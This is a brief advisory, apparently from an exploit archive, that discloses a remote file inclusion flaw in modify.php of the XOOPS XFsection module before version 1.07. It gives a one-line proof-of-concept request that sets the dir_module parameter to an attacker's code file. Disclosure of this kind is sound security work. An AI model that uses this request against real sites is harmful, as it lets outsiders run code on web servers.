XOOPS module XFsection versions below 1.07 suffer from a remote file inclusion vulnerability in modify.php.
b1c13a21daf6d6264804920b57cffa5d95d37ebf9df2b1b1f6f18111e3335426
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module XFsection Remote File Inclusion
version: < 1.07
source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~